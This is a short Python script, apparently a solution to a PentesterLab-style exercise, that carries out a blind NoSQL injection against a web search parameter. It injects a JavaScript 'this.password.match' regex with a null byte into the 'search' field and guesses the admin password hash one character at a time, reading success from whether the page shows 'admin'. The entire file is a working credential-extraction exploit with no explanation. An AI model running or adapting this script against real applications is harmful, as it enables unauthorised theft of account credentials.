

import urllib.request
import  string


def check(url):
    resp = urllib.request.urlopen(url)
    data = resp.read()
    if ">admin<" in str(data):
        print(url)
        return True
    else:
        return False

def checkBig():
    chars = "-0123456789qwertyuioplkjhgfdsazxcvbnm"
    url_part2 ="/)%00"
    url_part1="https://ptl-5d77a601-abe32701.libcurl.so/?search=admin%27%26%26%20this.password.match(/^5b317d17"
    k=True
    i=0
    j=0
    while k:
        t = check(url_part1+chars[i]+url_part2)
        
        if t:
            
            url_part1=url_part1+chars[i]
            i=0
            continue
        
        if t==False and i==len(chars)-1:
            break
        
        i+=1
        
    
checkBig()
